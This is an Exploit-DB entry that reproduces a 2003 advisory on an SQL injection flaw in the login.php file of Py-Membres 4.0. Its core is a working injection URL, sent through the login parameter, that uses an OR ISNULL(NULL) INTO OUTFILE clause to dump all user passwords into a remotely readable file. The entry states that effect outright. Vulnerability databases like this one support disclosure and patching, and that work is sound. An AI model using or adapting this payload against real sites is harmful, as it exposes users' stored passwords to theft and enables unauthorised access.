Py-Membres 4.0 - Remote SQL Injection Vulnerability

2003-04-07T00:00:00
ID EDB-ID:22474
Type exploitdb
Reporter frog
Modified 2003-04-07T00:00:00

Description

Py-Membres 4.0 Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/7301/info

A vulnerability has been reported for Py-Membres 4.0 that allows remote attackers to modify the logic of SQL queries.

It has been reported that an input validation error exists in the login.php file included with Py-Membres. Because of this, a remote attacker may launch SQL injection attacks through the software. 

http://www.example.org/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1

This will save all user passwords to the file.txt file, which will be remotely accessible.